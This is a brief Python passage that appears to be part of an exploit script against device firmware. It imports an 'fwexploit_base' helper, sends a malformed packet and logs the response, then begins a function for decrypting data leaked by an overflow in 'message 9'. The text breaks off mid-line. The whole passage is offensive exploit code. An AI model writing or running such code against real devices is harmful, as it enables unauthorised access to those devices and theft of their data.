from fwexploit_base import * from tqdm import tqdm write_pkt(0x11111) resp, data = read_responses() log.info("invalid packet returned %s, %s", resp, data) CRC = crc32(b"A" * 16) def decrypt_msg9(size): """ Overflowing decryption from message 9. Uses (CRC, size, 10, 0) as the IV for overflowed blocks. """ block_old = struct.pack("